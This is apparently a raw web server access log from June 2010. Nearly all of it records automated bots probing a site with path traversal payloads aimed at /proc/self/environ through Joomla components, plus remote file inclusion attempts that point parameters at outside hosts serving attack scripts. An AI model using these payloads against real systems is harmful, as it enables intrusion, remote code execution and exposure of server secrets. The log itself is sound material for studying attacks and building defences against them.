81.208.34.38 - - [29/Jun/2010:11:51:02 -0500] "GET /logs/access_log.1275264000//poll/poll_ssi.php?include_path=http://carollia.indelec.cz/Meatio_Develop/code/SA_Scripts/id.txt?? HTTP/1.1" 404 329 "-""libwww-perl/5.808"
81.208.34.38 - - [29/Jun/2010:11:51:03 -0500] "GET //poll/poll_ssi.php?include_path=http://carollia.indelec.cz/Meatio_Develop/code/SA_Scripts/id.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.808"
81.208.34.38 - - [29/Jun/2010:11:51:06 -0500] "GET /logs//poll/poll_ssi.php?include_path=http://carollia.indelec.cz/Meatio_Develop/code/SA_Scripts/id.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.808"
38.113.115.196 - - [29/Jun/2010:11:51:17 -0500] "GET //web2/index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
211.234.100.196 - - [29/Jun/2010:11:51:29 -0500] "GET /logs/access_log.1276473600/?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.805"
211.234.100.196 - - [29/Jun/2010:11:51:30 -0500] "GET /?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
211.234.100.196 - - [29/Jun/2010:11:51:30 -0500] "GET /logs/?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 11360 "-""libwww-perl/5.805"
173.83.250.93 - - [29/Jun/2010:11:51:32 -0500] "GET //web2/index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
211.234.100.196 - - [29/Jun/2010:11:51:36 -0500] "GET /logs/access_log.1276473600/?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.805"
211.234.100.196 - - [29/Jun/2010:11:51:37 -0500] "GET /?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
211.234.100.196 - - [29/Jun/2010:11:51:37 -0500] "GET /logs/?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 11360 "-""libwww-perl/5.805"
38.113.115.196 - - [29/Jun/2010:11:51:46 -0500] "GET //web2/index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
173.83.250.93 - - [29/Jun/2010:11:51:53 -0500] "GET //web2/index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
173.83.250.93 - - [29/Jun/2010:11:51:58 -0500] "GET //web2/index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
173.83.250.93 - - [29/Jun/2010:11:51:58 -0500] "GET //web2/index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
173.83.250.93 - - [29/Jun/2010:11:51:59 -0500] "GET //web2/index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
173.83.250.93 - - [29/Jun/2010:11:51:59 -0500] "GET //web2/index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
173.83.250.93 - - [29/Jun/2010:11:52:00 -0500] "GET //web2/index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
173.83.250.93 - - [29/Jun/2010:11:52:01 -0500] "GET //web2/index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
173.83.250.93 - - [29/Jun/2010:11:52:02 -0500] "GET //web2/index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
173.83.250.93 - - [29/Jun/2010:11:52:04 -0500] "GET //web2/index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
173.83.250.93 - - [29/Jun/2010:11:52:04 -0500] "GET //web2/index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
173.83.250.93 - - [29/Jun/2010:11:52:09 -0500] "GET //web2/index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
81.208.34.38 - - [29/Jun/2010:11:52:51 -0500] "GET /logs/access_log.1275264000//poll/poll_ssi.php?include_path=http://carollia.indelec.cz/Meatio_Develop/code/SA_Scripts/id.txt?? HTTP/1.1" 404 329 "-""libwww-perl/5.808"
81.208.34.38 - - [29/Jun/2010:11:52:52 -0500] "GET //poll/poll_ssi.php?include_path=http://carollia.indelec.cz/Meatio_Develop/code/SA_Scripts/id.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.808"
81.208.34.38 - - [29/Jun/2010:11:52:52 -0500] "GET /logs//poll/poll_ssi.php?include_path=http://carollia.indelec.cz/Meatio_Develop/code/SA_Scripts/id.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.808"
38.113.115.196 - - [29/Jun/2010:11:53:10 -0500] "GET /logs/access_log.1277424000//web2/index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 326 "-""libwww-perl/5.79"
38.113.115.196 - - [29/Jun/2010:11:53:10 -0500] "GET //web2/index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
38.113.115.196 - - [29/Jun/2010:11:53:11 -0500] "GET /logs//web2/index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 304 "-""libwww-perl/5.79"
38.113.115.196 - - [29/Jun/2010:11:53:11 -0500] "GET /logs/access_log.1275264000//web2/index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 326 "-""libwww-perl/5.79"
38.113.115.196 - - [29/Jun/2010:11:53:15 -0500] "GET /logs/access_log.1277424000//web2/index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 326 "-""libwww-perl/5.79"
38.113.115.196 - - [29/Jun/2010:11:53:15 -0500] "GET //web2/index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
38.113.115.196 - - [29/Jun/2010:11:53:15 -0500] "GET /logs//web2/index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 304 "-""libwww-perl/5.79"
38.113.115.196 - - [29/Jun/2010:11:53:15 -0500] "GET /logs/access_log.1275264000//web2/index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 326 "-""libwww-perl/5.79"
114.200.199.236 - - [29/Jun/2010:11:53:17 -0500] "GET /logs/access_log.1274572800/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.79"
173.83.250.93 - - [29/Jun/2010:11:53:50 -0500] "GET /logs/access_log.1277424000//web2/index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 326 "-""libwww-perl/5.810"
173.83.250.93 - - [29/Jun/2010:11:53:50 -0500] "GET /logs/access_log.1277424000//web2/index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 326 "-""libwww-perl/5.810"
173.83.250.93 - - [29/Jun/2010:11:53:50 -0500] "GET //web2/index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
173.83.250.93 - - [29/Jun/2010:11:53:51 -0500] "GET //web2/index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
173.83.250.93 - - [29/Jun/2010:11:53:51 -0500] "GET /logs//web2/index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 304 "-""libwww-perl/5.810"
173.83.250.93 - - [29/Jun/2010:11:53:51 -0500] "GET /logs//web2/index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 304 "-""libwww-perl/5.810"
173.83.250.93 - - [29/Jun/2010:11:53:51 -0500] "GET /logs/access_log.1275264000//web2/index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 326 "-""libwww-perl/5.810"
173.83.250.93 - - [29/Jun/2010:11:53:51 -0500] "GET /logs/access_log.1275264000//web2/index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 326 "-""libwww-perl/5.810"
173.83.250.93 - - [29/Jun/2010:11:54:03 -0500] "GET /logs/access_log.1277424000//web2/index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 326 "-""libwww-perl/5.810"
173.83.250.93 - - [29/Jun/2010:11:54:03 -0500] "GET //web2/index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
173.83.250.93 - - [29/Jun/2010:11:54:03 -0500] "GET /logs//web2/index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 304 "-""libwww-perl/5.810"
173.83.250.93 - - [29/Jun/2010:11:54:03 -0500] "GET /logs/access_log.1275264000//web2/index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 326 "-""libwww-perl/5.810"
173.83.250.93 - - [29/Jun/2010:11:54:21 -0500] "GET /logs/access_log.1277424000//web2/index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 326 "-""libwww-perl/5.810"
173.83.250.93 - - [29/Jun/2010:11:54:21 -0500] "GET //web2/index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
173.83.250.93 - - [29/Jun/2010:11:54:21 -0500] "GET /logs//web2/index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 304 "-""libwww-perl/5.810"
173.83.250.93 - - [29/Jun/2010:11:54:21 -0500] "GET /logs/access_log.1275264000//web2/index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 326 "-""libwww-perl/5.810"
173.83.250.93 - - [29/Jun/2010:11:54:34 -0500] "GET /logs/access_log.1277424000//web2/index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 326 "-""libwww-perl/5.810"
173.83.250.93 - - [29/Jun/2010:11:54:34 -0500] "GET //web2/index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
173.83.250.93 - - [29/Jun/2010:11:54:35 -0500] "GET /logs//web2/index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 304 "-""libwww-perl/5.810"
173.83.250.93 - - [29/Jun/2010:11:54:35 -0500] "GET /logs/access_log.1275264000//web2/index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 326 "-""libwww-perl/5.810"
173.83.250.93 - - [29/Jun/2010:11:54:37 -0500] "GET /logs/access_log.1277424000//web2/index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 326 "-""libwww-perl/5.810"
173.83.250.93 - - [29/Jun/2010:11:54:37 -0500] "GET /logs/access_log.1277424000//web2/index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 326 "-""libwww-perl/5.810"
173.83.250.93 - - [29/Jun/2010:11:54:37 -0500] "GET //web2/index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
173.83.250.93 - - [29/Jun/2010:11:54:37 -0500] "GET //web2/index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
173.83.250.93 - - [29/Jun/2010:11:54:37 -0500] "GET /logs//web2/index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 304 "-""libwww-perl/5.810"
173.83.250.93 - - [29/Jun/2010:11:54:37 -0500] "GET /logs//web2/index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 304 "-""libwww-perl/5.810"
173.83.250.93 - - [29/Jun/2010:11:54:37 -0500] "GET /logs/access_log.1275264000//web2/index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 326 "-""libwww-perl/5.810"
173.83.250.93 - - [29/Jun/2010:11:54:37 -0500] "GET /logs/access_log.1275264000//web2/index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 326 "-""libwww-perl/5.810"
173.83.250.93 - - [29/Jun/2010:11:54:38 -0500] "GET /logs/access_log.1277424000//web2/index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 326 "-""libwww-perl/5.810"
173.83.250.93 - - [29/Jun/2010:11:54:38 -0500] "GET //web2/index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
173.83.250.93 - - [29/Jun/2010:11:54:38 -0500] "GET /logs//web2/index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 304 "-""libwww-perl/5.810"
173.83.250.93 - - [29/Jun/2010:11:54:38 -0500] "GET /logs/access_log.1275264000//web2/index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 326 "-""libwww-perl/5.810"
38.113.115.196 - - [29/Jun/2010:11:54:39 -0500] "GET /logs/access_log.1275264000//web2/index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 326 "-""libwww-perl/5.79"
38.113.115.196 - - [29/Jun/2010:11:54:40 -0500] "GET //web2/index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
38.113.115.196 - - [29/Jun/2010:11:54:40 -0500] "GET /logs//web2/index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 304 "-""libwww-perl/5.79"
38.113.115.196 - - [29/Jun/2010:11:54:40 -0500] "GET /logs/access_log.1277424000//web2/index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 326 "-""libwww-perl/5.79"
114.200.199.236 - - [29/Jun/2010:11:54:42 -0500] "GET /logs/access_log.1274572800/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.79"
173.83.250.93 - - [29/Jun/2010:11:54:42 -0500] "GET /logs/access_log.1277424000//web2/index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 326 "-""libwww-perl/5.810"
173.83.250.93 - - [29/Jun/2010:11:54:42 -0500] "GET //web2/index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
173.83.250.93 - - [29/Jun/2010:11:54:42 -0500] "GET /logs//web2/index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 304 "-""libwww-perl/5.810"
173.83.250.93 - - [29/Jun/2010:11:54:43 -0500] "GET /logs/access_log.1275264000//web2/index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 326 "-""libwww-perl/5.810"
114.200.199.236 - - [29/Jun/2010:11:54:43 -0500] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.79"
114.200.199.236 - - [29/Jun/2010:11:54:43 -0500] "GET /logs/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 11360 "-""libwww-perl/5.79"
65.19.154.163 - - [29/Jun/2010:11:55:03 -0500] "GET /tattoo/tattoo1.htm HTTP/1.0" 200 4192 "-""Mozilla/5.0 (compatible; kmky-not-a-bot/0.2; http://www.kilomonkey.com/notabot.txt )"
173.83.250.93 - - [29/Jun/2010:11:55:26 -0500] "GET /logs/access_log.1275264000//web2/index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 326 "-""libwww-perl/5.810"
173.83.250.93 - - [29/Jun/2010:11:55:26 -0500] "GET //web2/index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
173.83.250.93 - - [29/Jun/2010:11:55:26 -0500] "GET /logs//web2/index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 304 "-""libwww-perl/5.810"
173.83.250.93 - - [29/Jun/2010:11:55:26 -0500] "GET /logs/access_log.1277424000//web2/index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 326 "-""libwww-perl/5.810"
173.83.250.93 - - [29/Jun/2010:11:55:33 -0500] "GET /logs/access_log.1275264000//web2/index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 326 "-""libwww-perl/5.810"
173.83.250.93 - - [29/Jun/2010:11:55:33 -0500] "GET //web2/index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
173.83.250.93 - - [29/Jun/2010:11:55:33 -0500] "GET /logs//web2/index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 304 "-""libwww-perl/5.810"
173.83.250.93 - - [29/Jun/2010:11:55:33 -0500] "GET /logs/access_log.1277424000//web2/index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 326 "-""libwww-perl/5.810"
173.83.250.93 - - [29/Jun/2010:11:55:40 -0500] "GET /logs/access_log.1275264000//web2/index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 326 "-""libwww-perl/5.810"
173.83.250.93 - - [29/Jun/2010:11:55:42 -0500] "GET /logs/access_log.1275264000//web2/index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 326 "-""libwww-perl/5.810"
173.83.250.93 - - [29/Jun/2010:11:55:42 -0500] "GET //web2/index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
173.83.250.93 - - [29/Jun/2010:11:55:42 -0500] "GET /logs//web2/index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 304 "-""libwww-perl/5.810"
173.83.250.93 - - [29/Jun/2010:11:55:43 -0500] "GET /logs/access_log.1277424000//web2/index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 326 "-""libwww-perl/5.810"
173.83.250.93 - - [29/Jun/2010:11:55:45 -0500] "GET //web2/index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
173.83.250.93 - - [29/Jun/2010:11:55:45 -0500] "GET /logs//web2/index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 304 "-""libwww-perl/5.810"
173.83.250.93 - - [29/Jun/2010:11:55:45 -0500] "GET /logs/access_log.1275264000//web2/index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 326 "-""libwww-perl/5.810"
173.83.250.93 - - [29/Jun/2010:11:55:45 -0500] "GET /logs/access_log.1277424000//web2/index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 326 "-""libwww-perl/5.810"
173.83.250.93 - - [29/Jun/2010:11:55:45 -0500] "GET //web2/index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
173.83.250.93 - - [29/Jun/2010:11:55:45 -0500] "GET /logs//web2/index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 304 "-""libwww-perl/5.810"
173.83.250.93 - - [29/Jun/2010:11:55:45 -0500] "GET /logs/access_log.1277424000//web2/index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 326 "-""libwww-perl/5.810"
92.53.106.20 - - [29/Jun/2010:11:55:57 -0500] "GET /logs/access_log.1266710400%20%20///skin/pqbig_board_blue/login.php?dir=http://djwenterprizes.com/mozhet/1.pdf? HTTP/1.1" 404 346 "-""Mozilla/5.0"
67.195.112.180 - - [29/Jun/2010:11:59:58 -0500] "GET /artwork/furniture.htm HTTP/1.0" 200 1004 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
38.113.115.196 - - [29/Jun/2010:12:00:18 -0500] "GET //web2/index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
114.200.199.236 - - [29/Jun/2010:12:00:34 -0500] "GET /logs/access_log.1275868800/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.79"
83.16.100.218 - - [29/Jun/2010:12:00:51 -0500] "GET /logs/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.apbs.pl/images/open.jpg??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
83.16.100.218 - - [29/Jun/2010:12:00:51 -0500] "GET /logs/access_log.1266710400/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.apbs.pl/images/open.jpg??? HTTP/1.1" 404 357 "-""Mozilla/5.0"
83.16.100.218 - - [29/Jun/2010:12:00:51 -0500] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.apbs.pl/images/open.jpg??? HTTP/1.1" 404 330 "-""Mozilla/5.0"
